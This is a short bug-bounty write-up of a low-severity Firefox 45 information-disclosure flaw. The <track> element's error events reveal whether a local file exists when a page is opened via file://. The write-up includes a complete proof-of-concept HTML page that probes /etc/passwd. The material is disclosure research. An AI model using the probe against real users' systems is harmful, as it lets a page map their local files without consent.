This is going to be a short write-up about my first browser bug find, which was found in Firefox/45.0. The bug is of type "csectype-disclosure" and was flagged as sec-low by Mozilla's team because the malicious page has to be loaded locally (via the file:// protocol).
The bug existed because a <track>'s onerror event is fired twice if the file pointed to in its src attribute doesn't exist, but fires only once if the file exists but is not playable. Counting the error events therefore tells the page whether a given local file exists. The <track> tag has to be placed between the opening and closing tags of an <audio> or <video> element. The following code is the PoC that was typically sent along with the report to Mozilla's team:
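    <html>
    <head>
    <title>Testing</title>
    </head>
    <body>
    <!-- The <track> must sit inside an <audio> or <video> element -->
    <audio>
    <track id="q" src="file:///etc/passwd">
    </audio>
    <script>
    // Count how many times the track's onerror handler fires
    var i=0;
    q.onerror=function(){
        i++;
    };
    // After 100 ms: one error means the file exists (but is not playable),
    // two errors mean the file does not exist
    setTimeout(function(){
        if(i==1){
            alert('File Exists');
        }else{
            alert('File Does Not Exist');
        }
    },100);
    </script>
    </body>
    </html>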
Finally, I would like to shout out to @Qab for making all that possible.